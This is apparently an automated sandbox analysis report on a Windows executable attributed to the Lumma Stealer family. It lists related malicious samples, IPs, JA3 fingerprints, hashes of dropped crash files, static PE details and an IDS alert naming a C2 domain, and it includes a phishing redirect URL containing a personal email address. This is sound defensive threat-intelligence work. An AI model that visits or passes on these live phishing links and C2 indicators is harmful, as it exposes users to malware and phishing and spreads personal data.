	https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://painel.simpatiafm.com.br/	Get hash	malicious	Unknown	Browse	162.247.243.29
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	104.20.86.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	172.67.35.220
	SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe	Get hash	malicious	Xmrig	Browse	104.20.4.235
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	23.212.89.10
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exe	Get hash	malicious	Unknown	Browse	2.19.126.150
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	20Listen.eml	Get hash	malicious	HTMLPhisher	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	SecuriteInfo.com.Win32.Evo-gen.15503.22039.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	SecuriteInfo.com.Win32.Evo-gen.11764.10915.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204
	SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.206.204

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_9cfab2bc-8e6f-4031-aac4-8891c7a30c58\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0368526094833834
Encrypted:	false
SSDEEP:	192:Pj7ahqXtvTPlktS0Wbk4E3juFBNWpzuiFGZ24IO8ThB:tTN6ZWbkrjhpzuiFGY4IO8r
MD5:	13AFFED09F04024CA0D5CBCC386ACAC5
SHA1:	580302215D92BBD736F8EBD8D8D2C8A525AF2649
SHA-256:	5C485376E3C9E8DB58F2219745AF354A236F8C335E3D4A78A7658B8AD7CF82CA
SHA-512:	F8132B91F10ADEC4BD65B2AA3EF61DC81D9FE2C0169B99F245C43DAE5370B1FC11155C3556582DFB7018AE6DBF147898647744BDEA785724B682C435FB8C93A3
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.4.1.6.4.2.5.5.3.5.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.4.1.6.4.2.9.9.1.0.7.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.f.a.b.2.b.c.-.8.e.6.f.-.4.0.3.1.-.a.a.c.4.-.8.8.9.1.c.7.a.3.0.c.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.b.8.3.4.3.3.-.1.3.4.3.-.4.7.c.3.-.b.b.0.1.-.f.2.f.7.b.e.4.4.c.4.2.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.0.-.0.0.0.1.-.0.0.1.4.-.c.9.e.c.-.c.9.6.0.d.5.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.2.e.f.f.8.4.2.3.c.5.f.8.8.8.4.8.9.0.8.e.2.d.6.6.d.f.5.6.2.b.b.d.3.3.d.f.1.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_86d780998731d44cc37040f9271b2fbde5bee817_852b229c_5ebf9abd-6ea0-4dee-b7fe-65fc2553a077\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0442595195084101
Encrypted:	false
SSDEEP:	192:iS4SkSVqXtvDPlrk0F3/fMVE3juFBNWpzuiFGZ24IO8khB:p8DNLFvfMajhpzuiFGY4IO8+
MD5:	1D1DF14CE19175824DFD6E07EAB8A617
SHA1:	3E25A3B3254AEAD482E5BEE942B54A309551CEC1
SHA-256:	30576F0D305FDAF372676E5077BC4954F72D3AAEDAB65421F2BEE97610A2FB54
SHA-512:	F5B79CE05D2ED238B0F67E90EF021743C82766BFE2B3AB096B875488405AACE986510473EC28EE96F01E65F528D28859073EFE4704AE0727B591BDD14EC5F81B
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.4.1.6.2.7.7.9.9.2.7.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.4.1.6.2.8.3.7.7.4.1.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.b.f.9.a.b.d.-.6.e.a.0.-.4.d.e.e.-.b.7.f.e.-.6.5.f.c.2.5.5.3.a.0.7.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.d.c.5.a.b.2.-.1.b.e.7.-.4.4.c.c.-.9.4.9.4.-.f.b.8.b.2.3.b.f.3.b.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.b.0.-.0.0.0.1.-.0.0.1.4.-.c.9.e.c.-.c.9.6.0.d.5.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.2.e.f.f.8.4.2.3.c.5.f.8.8.8.4.8.9.0.8.e.2.d.6.6.d.f.5.6.2.b.b.d.3.3.d.f.1.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.4.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER160F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Mon Oct 14 01:07:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46674
Entropy (8bit):	2.68430004749912
Encrypted:	false
SSDEEP:	192:mbikxbacMMtOABI3o4pwpS6hRjnTG1V10EdtzrMY7Pwf6rgAb:6xboLABwzpwpvhR7a1VZD0Ysf6rgAb
MD5:	A2ECCF846D9508FC2AA24CD9EE1ECE64
SHA1:	6D7C999DBAE7AB7246363A60FBD4D273D957F5E5
SHA-256:	848B29E88F0169DB77AAB0C9592680D3B0727DC5DE6BAAE7D6D773B7E3E24A9B
SHA-512:	7DF5D17E11B7FEBF58BFBEB97AE73B37C8BDA86A00AF9A80AC239180CC21C5B07AEBBBFDB316642C5D94769E992B771434627F393213F7F0C19ED3BA2591FA1B
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........n.g............4...........T...H............ ......$....0..........`.......8...........T...........`K...j...........!...........#..............................................................................eJ......4$......GenuineIntel............T............n.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16DB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8296
Entropy (8bit):	3.677578299279278
Encrypted:	false
SSDEEP:	192:R6l7wVeJjCM6ms6YEItSU9NagmfBGeZprm89bQJRsfjmpm:R6lXJd6N6YEiSU9NagmfZLQJKf6E
MD5:	B13E7FF403C41A2D5713DD8D107AACFF
SHA1:	5768D472D07BE3609157BFD95127BAFFC5B9E27D
SHA-256:	250EAAF4A28971A97985D5EF48DB6517D9EAF4C7B13F65A5B050F56C2667BE59
SHA-512:	B9DBBE792FBB980BDD115B824C692FE7EDB1F4A55E92F852029A9A73ACE56C7168045319C4F9FFCA83E68310196ECA94D61BEE9F7B02869CF1527D8C9196D513
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16FB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4542
Entropy (8bit):	4.428254800284924
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg77aI9UHWpW8VYqYm8M4JjlFO+q8Cwjzid:uIjfOI7y27VyJqAjzid
MD5:	D0B888374F0385B2E7BE95932EEFE3C0
SHA1:	FB4D9CA77D7BAA1912FB0D0AC93B097AE349F624
SHA-256:	5C7C70FC011651DCB8F324846AABFDFD9E9C6092DD3A8472F4D863A3FC85EFE3
SHA-512:	3B092607195E6BB0BA2D6389B87A1DA7CD56AF79724F2579424E7970B2F18912B1A84CF5F7D9D372CD6651BB40AD95CC2256B44E3BA74EAB6EE62EE4DA7E5384
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542410" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC42.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Oct 14 01:07:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	284982
Entropy (8bit):	1.5055660303796772
Encrypted:	false
SSDEEP:	768:DJ96ABLFeshet4qVBYnTByeASVuVsZQjERi0Gvg:DJnTerUEeXVuGZQjuPGY
MD5:	F8FA0314B2BE0E2CA91AA9B00FF724CD
SHA1:	B1A8CD354F8A774808C1C8B327C9CE49D6D7D590
SHA-256:	72C117CB82D31C08820D74CC2CAAF4D35767FAB2B7AF9A19A8C6AA1CE60123AC
SHA-512:	B6326550460FFFB5392F83F3D812CE80BBC5DBFBBC43A7DCD4272B1DA53E135A92F46828E04B2D36866CC68CD67B9D8BB354FA1A32253988152089739B6D6493
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........n.g........................T...............,'......................`.......8...........T............L..6...........@(..........,..............................................................................eJ.............GenuineIntel............T............n.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD7B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.686394281718714
Encrypted:	false
SSDEEP:	192:R6l7wVeJjCC65b6YEI1SU9r/gmf6Q5cR/npDs89bQRRsfDmBm:R6lXJL616YE6SU9r/gmfh+J7QRKfa8
MD5:	61E393267F80B8EC25DBBDC1DC0C2D28
SHA1:	64BECB784417DFA54684DA58D2965324A27B693B
SHA-256:	AB20635E11585E945635E298199C407699F170D29DB97A453B05313E7BC224C3
SHA-512:	429459D4463A3A26129392899A2A632E17797B119C6178FB299AA42969BE0C59E433892E3EB57AB387E6EA35C5ADB4FCC509D7108D63F14ACB0051E5677CD2AF
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDAB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4661
Entropy (8bit):	4.424956045566915
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg77aI9UHWpW8VYvYm8M4JjUFvE8+q8vU5jzid:uIjfoI7y27VrJeKqjzid
MD5:	9DB508B42CAA5B06E032659F902C3882
SHA1:	D47597F5441F278D0B4E0A6B099CFBCF7A4A29CD
SHA-256:	6D9FB09469449CE86CEF4046EA50D854314106E94BEB2B892084D69EAFC6F676
SHA-512:	27C28993C7D9D95FB18B4348A7A9C1B4C7CE71DF5458849753D488B0E0634C22704D7AB5663CD352593DE086252156CDF2F30593EF8C6383F73EF3720168877F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542409" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421327420620249
Encrypted:	false
SSDEEP:	6144:0Svfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:/vloTTW+EZMM6DFy403w
MD5:	5CDF4A1215853E721BF4B4BE9F2AA747
SHA1:	F3680E18A0C37A34C4B896FE4DF6C880C4A2B00C
SHA-256:	0A71785B51F038CAF96C666403E56E3CA69D64AC87A5A2ED7A6A284BF8E0BA90
SHA-512:	11F99817E0CFF7002C04E4A54887FF50016E52A73D0D38ED1007369449B3B1759B254F911B1CB6B48703A1453C175CD04A662A2D137F1D259B34B9913B1EC47B
Malicious:	false
Reputation:	low
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.i.c...................................................................................................................................................................................................................................................................................................................................................W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.490552881032947
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'936'320 bytes
MD5:	aa925ed1e2cda721f6ad1197ebb068d3
SHA1:	d22eff8423c5f88848908e2d66df562bbd33df1e
SHA256:	2656845a7266c11e911d3c0549f7f859932c68bc4946bea997d504a013c9297b
SHA512:	a86ea35d1f460f43b7d53965a633af010a40771a084f12f31a4dc426c1cd87fc2e96ec1395d1a0ae2516e0b4ff1a9d0a1af40910edebd3d24a73d444b1d366ad
SSDEEP:	49152:SnEkB9bG8v2kGQZrIfr0SueCOYrwRTu4EQ0p+pRMu4Kn42:SnE29bG8v2kGQZsVueC74y+fX4c
TLSH:	7AD53A62B84972CFC8CA27788517CE82592D47B8073548C3B89DB8FE7D66DC519B6C38
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................P0...........@...........................0......D-...@.................................W...k..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x705000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F5E793552CAh
shrd dword ptr [eax+eax], ebp, 00000000h
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5f057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5d000	0x25e00	90640c3238ae54a397ecf57c70879984	False	0.9995552289603961	data	7.984047314894568	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5f000	0x1000	0x200	fe72def8b74193a84232a780098a7ce0	False	0.150390625	data	1.04205214219471	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bijpfrbm	0x60000	0x2a4000	0x2a3600	ce14a9ae6b0fe344d4de05d9fd530f00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gyofjiju	0x304000	0x1000	0x600	0344868bd4a2c9333fa1dea68f74e1b4	False	0.5891927083333334	data	5.1326819419122796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x305000	0x3000	0x2200	b2eda3e1fd0524d59752dea70dfcaa0d	False	0.06479779411764706	DOS executable (COM)	0.7030738219757081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T03:07:04.451545+0200	2056471	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)	1	192.168.2.5	65430	1.1.1.1	53	UDP
